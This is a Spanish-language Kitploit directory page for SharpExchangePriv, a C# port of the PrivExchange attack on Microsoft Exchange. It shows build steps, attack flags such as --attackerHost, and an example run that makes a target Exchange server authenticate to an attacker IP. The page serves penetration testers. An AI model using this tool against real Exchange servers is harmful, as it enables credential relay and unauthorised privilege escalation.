Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/panagioto/sharpexchangepriv
Escalada de PrivilegiosExplotaciónPruebas de Penetración
GitHubpanagioto/sharpexchangepriv

SharpExchangePriv

Una implementación en C# de PrivExchange por @_dirkjan.

Ver Repositorio
155281hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpExchangePriv

Descripción

Una implementación en C# de PrivExchange por @_dirkjan. Gracias a @g0ldenGunSec, ya que me basé en su código.

Se probó contra Exchange 2016.

Instrucciones de compilación

SharpExchangePriv se ha compilado con .NET 3.5 y es compatible con Visual Studio 2017. Simplemente abra el archivo de solución y compile el proyecto.

Usé CommandLineParser para analizar los argumentos. Esto creará el archivo CommandLine.dll, junto con el ejecutable. Puede fusionar fácilmente el .exe y el .dll en un solo archivo ejecutable:

ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll

Uso

--targetHost

Establezca la IP del host de destino.

--attackerHost

Establezca la IP del atacante

--attackerPort

Establezca el puerto del atacante

--attackerPage

Establezca la página del atacante

--ssl

Habilitar SSL

--exchangeVersion

Establezca la versión de Exchange, el valor predeterminado es 2016

--exchangePort

Establezca el puerto de destino de Exchange

Ejemplo

root@kitploit:~
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
 /$$$$$$$           /$$            /$$$$$$$$                     /$$
| $$__  $$         |__/           | $$_____/                    | $$
| $$  \ $$ /$$$$$$  /$$ /$$    /$$| $$       /$$   /$$  /$$$$$$$| $$$$$$$   /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$
| $$$$$$$//$$__  $$| $$|  $$  /$$/| $$$$$   |  $$ /$$/ /$$_____/| $$__  $$ |____  $$| $$__  $$ /$$__  $$ /$$__  $$
| $$____ /| $$  \__ /| $$ \  $$/$$/ | $$__ /    \  $$$$/ | $$      | $$  \ $$  /$$$$$$$| $$  \ $$| $$  \ $$| $$$$$$$$
| $$     | $$      | $$  \  $$$/  | $$        >$$  $$ | $$      | $$  | $$ /$$__  $$| $$  | $$| $$  | $$| $$_____ /
| $$     | $$      | $$   \  $/   | $$$$$$$$ /$$/\  $$|  $$$$$$$| $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$|  $$$$$$$
|__/     |__/      |__/    \_/    |________/|__/  \__/ \_______/|__/  |__/ \_______/|__/  |__/ \____  $$ \_______/
                                                                                               /$$  \ $$
                                                                                              |  $$$$$$/
                                                                                               \______ /
                                                                                                            @den_n1s

The target URL is https://192.168.11.10:443/EWS/Exchange.asmx

Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx

HTTP 200 response received, the target Exchange server should be authenticating shortly.

Contacto

Por favor, reporte cualquier error en la página del proyecto de Github o contácteme en twitter @den_n1s

Descargar herramienta